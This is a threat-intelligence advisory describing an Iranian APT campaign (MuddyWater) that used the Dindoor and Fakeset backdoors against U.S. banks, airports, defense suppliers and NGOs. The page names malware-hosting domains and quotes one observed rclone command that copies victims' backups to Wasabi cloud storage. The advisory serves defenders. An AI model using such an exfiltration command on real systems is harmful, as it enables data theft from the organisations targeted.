Iranian APT MuddyWater (Seedworm) Deploys Novel Dindoor & Fakeset Backdoors Against U.S. Critical Infrastructure — Threadlinqs Intelligence
As of 2026-05-30, Iranian APT MuddyWater (Seedworm) Deploys Novel Dindoor & Fakeset Backdoors Against U.S. Critical Infrastructure is a critical-severity apt threat attributed to MuddyWater (Iran), tracked by Threadlinqs Intelligence with 9 detection rules (Splunk SPL, Microsoft KQL, Sigma) and 45 indicators of compromise.
Threat ID: TL-2026-0198 · Severity: CRITICAL · Status: ACTIVE · Category: APT
Attribution: MuddyWater · Iran · ESPIONAGE
Iran's MuddyWater (Seedworm/MOIS) APT group has compromised networks of a U.S. bank, airport, defense software supplier, and NGOs using two previously unknown backdoors: Dindoor (Deno-based BYOR) and
Symantec's Threat Hunter Team uncovered a campaign by Seedworm (also tracked as MuddyWater, Temp.Zagros, Static Kitten), an Iranian APT linked to Iran's Ministry of Intelligence and Security (MOIS), targeting U.S. critical infrastructure and allied organizations.
The campaign deploys two previously unknown backdoors:
**Dindoor** is a novel backdoor that leverages the Deno JavaScript/TypeScript runtime as a 'Bring Your Own Runtime' (BYOR) evasion strategy. By bundling a legitimate runtime, the malware executes commands through a trusted process, bypassing application whitelisting and behavioral detections that target standard scripting engines like PowerShell or cmd.exe. Dindoor samples are digitally signed with a certificate issued to 'Amy Cherne', a previously unknown identity in public threat intelligence. Dindoor was deployed against the Israeli branch of a U.S. defense/aerospace software supplier, a U.S. bank, and a Canadian non-profit organization.
**Fakeset** is a Python-based backdoor downloaded from Backblaze cloud storage servers (gitempire.s3.us-east-005.backblazeb2.com and elvenforest.s3.us-east-005.backblazeb2.com). Fakeset samples are signed with certificates attributed to both 'Amy Cherne' and 'Donald Gay'. The 'Donald Gay' certificate has been previously associated with Stagecomp and Darkcomp malware used by Seedworm, as confirmed by Google, Microsoft, and Kaspersky. Fakeset was deployed against a U.S. airport and a U.S. non-profit organization.
The **Stagecomp/Darkcomp** loader chain is also present in this campaign. Stagecomp is a loader that downloads and executes the Darkcomp backdoor. Both are signed with the 'Donald Gay' certificate, establishing a clear link to Seedworm operations.
Data exfiltration was attempted using Rclone, an open-source command-line tool, copying data to Wasabi cloud storage buckets. The exfiltration command pattern observed was: 'rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[bucket]:/192.168.0.x'.
Investigation of exposed infrastructure revealed a VPS hosted in the Netherlands containing evidence of broader targeting including Israeli healthcare organizations, EgyptAir, Jordanian government entities, UAE companies, and Jewish/Israeli NGOs. The exposed VPS also showed Ethereum-based C2 resolution mechanisms.
The campaign began in early February 2026 and activity continued through the date of public disclosure on March 5, 2026. The timing is significant: U.S. and Israeli coordinated military operations against Iran began on February 28, 2026, and Iran's Supreme Leader was killed in an airstrike on March 1, 2026. Seedworm's pre-existing presence on U.S. and Israeli networks prior to hostilities places the group in a position to launch destructive operations.
Additional tools observed include remote access tools (AnyDesk, ScreenConnect, PDQ), the ReGeorg web shell, and credential-stealing utilities targeting browser credentials and mailbox access. Password spraying campaigns were also documented.
---
**Revalidated on 2026-03-12**
Since initial publication on March 5, 2026, revalidation on March 12 confirms the Dindoor/Fakeset campaign remains ACTIVE with no evidence of infrastructure takedown or certificate revocation. Critically, MuddyWater is now confirmed to be running at least four concurrent campaigns in early 2026: (1) the Dindoor/Fakeset campaign against U.S. critical infrastructure documented here, (2) Operation Olalampo (Group-IB, Jan 26 2026) targeting MENA with CHAR (Rust, AI-assisted), GhostFetch, HTTP_VIP, and GhostBackDoor — some using Telegram bot C2, (3) the RustyWater campaign (CloudSEK, Jan 2026) deploying a Rust-based RAT against Israeli government/military/financial/telecom via Hebrew-language spear-phishing, and (4) the UDPGangster campaign (FortiGuard, Dec 2025) using UDP-based C2 against Turkey/Israel/Azerbaijan. This operational tempo — four distinct campaigns, six+ novel malware families, four programming languages (JavaScript/Deno, Python, Rust, C++)
Target sectors: banking, aviation, defense, aerospace, nonprofit, software, government, healthcare
Target regions: United States, Canada, Israel, Jordan, United Arab Emirates, Egypt
Detections & IOCs
As of 2026-07-28, this threat has 9 detection rule(s) across Splunk SPL, Microsoft KQL and Sigma, and 45 indicator(s) of compromise. Detection query text and full IOC values are available to authenticated users and programmatically via the Threadlinqs MCP server (Purple tier). View plans.
APT, CRITICAL, threat intelligence, cybersecurity, T1587, T1588, T1566, T1078, T1059, T1059, T1505, T1133, T1553, T1027